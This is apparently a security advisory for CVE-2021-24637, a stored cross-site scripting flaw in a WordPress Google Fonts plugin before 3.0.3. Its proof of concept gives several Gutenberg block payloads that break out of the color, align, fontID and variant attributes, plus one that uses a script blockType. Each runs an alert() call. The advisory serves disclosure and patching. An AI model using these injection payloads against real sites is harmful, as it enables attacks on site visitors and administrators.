Fonts Plugin < 3.0.3 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24637

Description

The plugin does not escape and sanitise some of its block settings, allowing users with as role as low as Contributor to perform Stored Cross-Site Scripting attacks via blockType (combined with content), align, color, variant and fontID argument of a Gutenberg block.

Proof of Concept

As a contributor, put the following code in a post/page while in Code Editor mode

< 3.0.2
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","content":"Hello, World!","color":"red;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(1+origin)//"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","align":"center;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(2+origin)//","content":"Hello, World!"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//","variant":"400","content":"Hello, World!"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial","variant":"400;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(/Variant/)//","content":"Hello, World!"} /-->

< 3.0.3
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"script","fontID":"0","variant":"400","content":"alert(\u0022xss\u0022)"} /-->